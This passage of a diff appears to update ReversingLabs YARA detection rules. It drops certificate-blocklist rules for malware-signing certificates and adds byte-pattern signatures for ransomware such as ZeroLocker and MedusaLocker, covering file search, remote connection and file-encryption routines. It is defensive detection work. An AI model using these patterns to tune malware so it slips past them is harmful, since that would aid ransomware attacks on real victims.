-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3452-L3468"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d911156707cef97acf79c096b5d4a4db166ddf05237168f1ecffb0c0a2ebd8fa"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? 33
+            F6 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B D9 56 50 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83
+            C4 ?? 2B D3 8B CB 89 95 ?? ?? ?? ?? 0F B7 01 66 89 04 0A 8D 49 ?? 66 85 C0 75 ?? 8D
+            BD ?? ?? ?? ?? 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C6 75 ?? BE ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 53 A5 A5 66 A5 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 33 F6 8B 1D ?? ?? ?? ??
+            83 FB ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ??
+            66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B C6
+            EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B
+            10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66
+            85 D2 75 ?? 8B C6 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B
+            95 ?? ?? ?? ?? 0F B7 01 66 89 04 0A 8D 49 ?? 66 85 C0 75 ?? 8D BD ?? ?? ?? ?? 83 EF
+            ?? 33 C9 66 8B 47 ?? 8D 7F ?? 66 3B C1 75 ?? A1 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 89 07
+            8B F2 66 8B 02 83 C2 ?? 66 3B C1 75 ?? 8D BD ?? ?? ?? ?? 2B D6 83 EF ?? 66 8B 47 ??
+            83 C7 ?? 66 3B C1 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F6 85 ?? ?? ?? ?? ?? F3
+            A4 74 ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? F7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? 75 ?? 8B 8D ?? ?? ?? ?? 66 8B 85 ?? ?? ?? ?? 66 89 04 59 43 89 1D ?? ??
+            ?? ?? 33 F6 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_special_folders = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 BE ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 56 33 DB 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 56 53 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 56 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ??
+            ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 6A ?? 59 68 ?? ?? ?? ?? 53 F3 A5 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 59 F3 A5 68
+            ?? ?? ?? ?? 53 50 66 A5 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D
+            BD ?? ?? ?? ?? 6A ?? 59 68 ?? ?? ?? ?? 53 F3 A5 50 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 83 C4 ?? 53 6A ?? 50 53 FF D6 53 6A ?? 8D 85 ?? ?? ?? ?? 50 53 FF
+            D6 53 6A ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 8D BD ?? ?? ?? ?? 83 EF ?? 66 8B 47 ?? 83
+            C7 ?? 66 3B C3 75 ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? 83 EF ?? 66 8B
+            47 ?? 83 C7 ?? 66 3B C3 75 ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? 83 EF
+            ?? 66 8B 47 ?? 83 C7 ?? 66 3B C3 75 ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? A5 A5 A5 A5
+            66 A5 E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_connection = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 89 85 ??
+            ?? ?? ?? 33 DB 8B 45 ?? 8B FA 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53
+            50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? A0 ?? ?? ?? ?? 88 45 ?? 8D 85 ??
+            ?? ?? ?? 53 53 53 53 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ??
+            85 DB 74 ?? 33 C0 50 50 6A ?? 50 50 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 8B F8 85
+            FF 74 ?? 33 C0 50 68 ?? ?? ?? ?? 50 50 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 50
+            57 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8B 95 ?? ?? ?? ?? 33 C9 85 D2 74 ?? 8B CA 8D
+            41 ?? 89 85 ?? ?? ?? ?? 8A 01 41 84 C0 75 ?? 2B 8D ?? ?? ?? ?? 51 52 6A ?? 6A ?? 53
+            FF 15 ?? ?? ?? ?? 53 FF D6 8B 9D ?? ?? ?? ?? 57 FF D6 53 FF D6 8B 4D ?? 5F 5E 33 CD
+            5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_1 = {
+            55 8B EC 51 51 83 4D ?? ?? 83 4D ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68
+            ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? 6A ?? 58 EB ?? 56 8D 45 ?? 50
+            57 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? 6A ?? EB ?? 8B 75 ?? 3B C6 0F 42 F0 83 7D
+            ?? ?? 74 ?? 6A ?? 8D 45 ?? 50 56 FF 75 ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 5E
+            57 FF 15 ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? 3B 75 ?? 6A ?? 58 0F 45 F0 8B C6 EB
+            ?? 57 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5E 5F 8B E5 5D C2
+        }
+		$encrypt_files_2_p1 = {
+            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 C0 89 85 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? 50 89 85 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 59 33 C0 8D 7D ??
+            F3 AB 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85 C0 74 ?? FF 15 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? 83 CE ?? EB ?? 6A ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85
+            C0 74 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 5E 6A ?? 8B D6 59 E8 ?? ?? ?? ??
+            59 59 E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 75 ?? 6A ?? 5E E9 ?? ?? ?? ?? 80 BD ??
+            ?? ?? ?? ?? B8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? 3B F0 0F 47 F0 8D 85 ?? ?? ?? ?? 50
+            56 8B C8 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8B F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8 ?? ?? ??
+            ?? 59 59 BE ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ??
+            FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 5A 6A ?? 59 E8 ?? ?? ?? ?? 59 59 6A ?? E9
+            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 8D 55 ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C7 8B DF 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 74 ?? 8B
+        }
+		$encrypt_files_2_p2 = {
+            B5 ?? ?? ?? ?? 43 46 8B C3 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 75 ?? 89 B5 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 53 8B C8 E8 ?? ?? ?? ?? 33 D2 85 FF 7E ?? 8B 85 ?? ?? ?? ??
+            8A 0C 10 8B 85 ?? ?? ?? ?? 88 0C 10 42 3B D7 7C ?? 3B FB 7D ?? 8B C3 2B C7 50 8B 85
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 03 C7 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50
+            53 8B C8 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B
+            95 ?? ?? ?? ?? 8D 45 ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74
+            ?? 6A ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 59 59 85 C0 75 ?? 6A ?? 33 FF 5A 8B 85 ?? ?? ?? ?? 8A 4C 3D ?? 88 0C 38
+            47 3B FA 7C ?? 8D 75 ?? 6A ?? 2B F2 5F 8B 85 ?? ?? ?? ?? 8A 0C 32 88 0C 10 42 3B D7
+            7C ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 83 EC ?? 8D
+            85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+        }
+		$encrypt_files_2_p3 = {
+            85 C0 79 ?? 6A ?? E9 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 2B F7 8B 85 ?? ??
+            ?? ?? 8A 0C 37 88 0C 38 47 3B FA 7C ?? 8B B5 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8A 8C 02 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 88 0C 10 42 81 FA ?? ?? ?? ?? 7C ?? 83 BD ?? ?? ?? ?? ??
+            74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 75 ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B C6 E9 ?? ?? ?? ?? 51 6A ?? 53 FF B5 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 8B F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8
+            ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 87 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B
+            F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8 ?? ?? ?? ?? 59
+            59 EB ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 01 34 85
+            ?? ?? ?? ?? FF 04 85 ?? ?? ?? ?? 33 FF 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B C7 E8 ?? ?? ?? ?? C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MHOW PTY LTD" and pe.signatures [ i ] . serial == "73:ec:fd:bb:99:ae:c1:76:dd:fc:f7:95:8d:12:0e:1a" and 1566864000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $find_special_folders ) and ( $encrypt_files_1 ) and ( all of ( $encrypt_files_2_p* ) ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_675129Bb174A5B05E330Cc09F8Bbd70A : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Zerolocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects ZeroLocker ransomware."
 		author = "ReversingLabs"
-		id = "97046206-efc4-58dd-a9df-4966bad3902d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "291b5640-387c-54d9-97a6-13823932fa60"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3470-L3486"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d989ea5233e8a64bffa0e29645c3458ef1f5173158ced7814c3b473b92ef49f4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.ZeroLocker.yara#L1-L70"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "147e4b390bcfaff8f05059c1d9a98b50f544fc32e820406417894fe5046e0f71"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "ZeroLocker"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALEX & CO PTY LIMITED" and pe.signatures [ i ] . serial == "67:51:29:bb:17:4a:5b:05:e3:30:cc:09:f8:bb:d7:0a" and 1565568000 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_De13Fe2Dbb8F890287E1780Aff6Ffd22 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "d2b15920-76ae-54e4-988c-278a3622ec52"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3488-L3504"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ebd983bcfa1e5d54af9d9e07d80d05f4752040eab92e63cd986db789fa07026f"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_routine_1 = {
+            00 28 5B 00 00 0A 20 ?? 07 00 00 28 60 00 00 06 13 09 20 ?? 07 00 00 28 60 00 00 06 13
+            0B 02 03 20 ?? 07 00 00 28 60 00 00 06 20 ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A 7D
+            1B 00 00 04 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 04 20 ?? 07 00 00 28 60 00 00 06 20
+            ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A 7D 1C 00 00 04 20 ?? 07 00 00 28 60 00 00 06
+            13 0B 02 7B 1C 00 00 04 20 ?? 07 00 00 28 60 00 00 06 6A 6F ?? 00 00 0A 00 20 ?? 07 00
+            00 28 60 00 00 06 13 0B 20 ?? 07 00 00 28 60 00 00 06 8D 1E 00 00 01 0A 20 ?? 07 00 00
+            28 60 00 00 06 13 0B 20 ?? 07 00 00 28 60 00 00 06 6A 13 04 20 ?? 07 00 00 28 60 00 00
+            06 13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A [0-2] 13 05 20 ?? 07 00 00 28 60 00 00 06 13
+            0B 73 ?? 00 00 0A 0C 20 ?? 07 00 00 28 60 00 00 06 13 0B 00 0E 05 20 ?? 07 00 00 28 60
+            00 00 06 59 13 0C 11 0C 45 02 00 00 00 02 00 00 00 ?? 00 00 00 2B ?? 00 20 ?? 07 00 00
+            28 60 00 00 06 13 0B 02 7B 1C 00 00 04 08 05 0E 04 6F ?? 00 00 0A [0-2] 20 ?? 07 00 00
+            28 60 00 00 06 73 ?? 00 00 0A 0B 2B ?? 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1C
+            00 00 04 08 05 0E 04 6F ?? 00 00 0A [0-2] 20 ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A
+            0B 00 2B 62 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1B 00 00 04 06 20 ?? 07 00 00 28
+            60 00 00 06 20 ?? 07 00 00 28 60 00 00 06 6F ?? 00 00 0A [0-2] 0D 20 ?? 07 00 00 28 60
+        }
+		$encrypt_routine_2 = {
+            00 00 06 13 0B 07 06 20 ?? 07 00 00 28 60 00 00 06 09 6F ?? 00 00 0A 00 20 ?? 07 00 00
+            28 60 00 00 06 13 0B 11 04 09 6A D6 13 04 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 04
+            11 05 FE 04 13 0D 11 0D 2D 86 ?? 45 01 00 00 00 F6 FF FF FF 17 2D 06 D0 4F 00 00 06 26
+            20 ?? 07 00 00 28 60 00 00 06 13 0B 07 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06
+            13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1C
+            00 00 04 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 0E 05 20 ?? 07 00 00 28
+            60 00 00 06 FE 01 13 0D 11 0D 2C 32 ?? 45 01 00 00 00 F6 FF FF FF 20 ?? 07 00 00 28 60
+            00 00 06 13 0B 03 73 ?? 00 00 0A 13 06 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 06 6F ??
+            00 00 0A 00 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 0E 05 20 ?? 07 00 00 28 60 00 00 06
+            FE 01 13 0D 11 0D 2C ?? [0-20] 20 ?? 07 00 00 28 60 00 00 06 13 0B 03 73 ?? 00 00 0A 13
+            07 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 07 6F ?? 00 00 0A 00 00 20 ?? ?? 00 00 28 60
+            00 00 06 13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A 00 20 ?? ?? 00 00 28 60 00 00 06 13 0B
+            02 7B 1C 00 00 04 6F ?? 00 00 0A 00 DD 3B 01 00 00 11 0A 2B 0D 11 0A 20 ?? ?? 00 00 28
+        }
+		$encrypt_routine_3 = {
+            60 00 00 06 58 20 ?? 08 00 00 28 60 00 00 06 13 0A 45 26 00 00 00 00 00 00 00 ?? FC FF
+            FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? ?? FF FF
+            ?? FD FF FF ?? FD FF FF ?? FD FF FF 00 00 00 00 ?? FD FF FF ?? FD FF FF ?? FD FF FF ??
+            FD FF FF ?? FD FF FF ?? FD FF FF ?? ?? FF FF ?? FD FF FF ?? FD FF FF ?? FD FF FF ?? ??
+            FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF
+            FF ?? FE FF FF E8 FE FF FF FC FE FF FF 10 FF FF FF 11 FF FF FF 29 FF FF FF 41 FF FF FF
+            DE 6D 11 0B 13 0A 11 09 20 ?? 08 00 00 28 60 00 00 06 30 16 ?? 45 01 00 00 00 F6 FF FF
+            FF 20 ?? 08 00 00 28 60 00 00 06 2B 02 11 09 45 02 00 00 00 00 00 00 00 11 FF FF FF DE
+            34 75 4B 00 00 01 14 FE 03 11 09 20 ?? 08 00 00 28 60 00 00 06 FE 03 5F 11 0A 20 ?? 08
+            00 00 28 60 00 00 06 FE 01 5F FE 11 74 4B 00 00 01 28 57 00 00 0A DE 93 20 ?? 08 00 00
+            28 60 00 00 06 28 ?? 00 00 0A
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LAST TIME PTY LTD" and pe.signatures [ i ] . serial == "de:13:fe:2d:bb:8f:89:02:87:e1:78:0a:ff:6f:fd:22" and 1566259200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $encrypt_routine_1 and $encrypt_routine_2 and $encrypt_routine_3 )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Da000D18949C247D4Ddfc2585Cc8Bd0F : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Medusalocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects MedusaLocker ransomware."
 		author = "ReversingLabs"
-		id = "3e939b73-abe4-5941-93ab-18bcde854aaf"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "8bfcfe13-b519-5c03-9770-cf245b01c395"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3506-L3524"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3453f13e633a2c233f78d0389c655bb5304e567407b3e0c5c47e5e7127c345ca"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.MedusaLocker.yara#L1-L174"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "73f915d476d1411d2e008d00c5ffa03596e3b62bcdbc4d91dc7226599a066c08"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "MedusaLocker"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PORT-SERVIS LTD" and ( pe.signatures [ i ] . serial == "00:da:00:0d:18:94:9c:24:7d:4d:df:c2:58:5c:c8:bd:0f" or pe.signatures [ i ] . serial == "da:00:0d:18:94:9c:24:7d:4d:df:c2:58:5c:c8:bd:0f" ) and 1564444800 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_06E842D3Ea6249D783D6B55E29C060C7 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "37829f07-c569-5e46-8b7a-2137c4c801e8"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3526-L3542"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9f71de0119527c8580f9e47e3fba07242814c5a537d727d4541fd7a802b0cb86"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 83
+            7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 8D ?? ?? ??
